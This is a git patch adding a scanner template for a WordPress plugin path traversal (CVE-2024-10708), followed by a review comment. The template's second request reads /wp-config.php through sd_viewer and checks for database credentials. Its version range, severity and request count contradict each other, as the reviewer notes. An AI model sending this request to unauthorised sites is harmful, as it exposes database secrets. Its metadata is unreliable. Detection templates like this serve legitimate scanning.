From b89c2b8a4fa68ca64218a5eb4367e4c058717101 Mon Sep 17 00:00:00 2001
From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com>
Date: Wed, 8 Oct 2025 09:18:12 +0900
Subject: [PATCH] Add files via upload

---
 http/cves/2024/CVE-2024-10708.yaml | 47 ++++++++++++++++++++++++++++++
 1 file changed, 47 insertions(+)
 create mode 100644 http/cves/2024/CVE-2024-10708.yaml

diff --git a/http/cves/2024/CVE-2024-10708.yaml b/http/cves/2024/CVE-2024-10708.yaml
new file mode 100644
index 00000000000..77509b3b1e4
--- /dev/null
+++ b/http/cves/2024/CVE-2024-10708.yaml
@@ -0,0 +1,47 @@
+id: CVE-2024-10708
+
+info:
+ name: System Dashboard < 2.8.15 - Admin+ Path Traversal
+ author: 0x_Akoko
+ severity: high
+ description: |
+ The System Dashboard plugin (<= 1.0.2) exposes a local file inclusion vulnerability.
+ This template logs in (Admin+) and then attempts to read system files via `sd_viewer`.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2024-10708
+ - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/system-dashboard/system-dashboard-103-local-file-inclusion
+ - https://wpscan.com/vulnerability/61d750a5-8c2c-4c94-a1a9-6a254c2a0d03/
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 6.5
+ cve-id: CVE-2024-10708
+ cwe-id: CWE-22
+ metadata:
+ verified: true
+ max-request: 3
+ tags: cve,cve2024,wordpress,wp-plugin,lfi,auth,system-dashboard
+
+http:
+ - raw:
+ - |
+ POST /wp-login.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ log={{username}}&pwd={{password}}&wp-submit=Log+In
+ - |
+ GET /wp-admin/admin-ajax.php?action=sd_viewer&filename=/wp-config.php&load_plugins[]=system-dashboard/system-dashboard.php HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "DB_NAME"
+ - "DB_PASSWORD"
+ condition: and
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
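Review bot: The `info` block of the new template is internally inconsistent: `name` says the affected range is `< 2.8.15`, the `description` says `(<= 1.0.2)`, and the Wordfence reference path names `103`, so a reader cannot tell which version is actually fixed. In the same block `severity: high` does not agree with `cvss-score: 6.5` (the medium band in CVSS v3.1), and the `Admin+` wording in `name` and `description` suggests `PR:H` rather than the `PR:L` recorded in `cvss-metrics`; the correct values should be reconciled against the linked advisories, since the patch itself does not establish them. `metadata.max-request: 3` also overstates the footprint, as the `raw` list holds exactly two requests, so it should read `max-request: 2`.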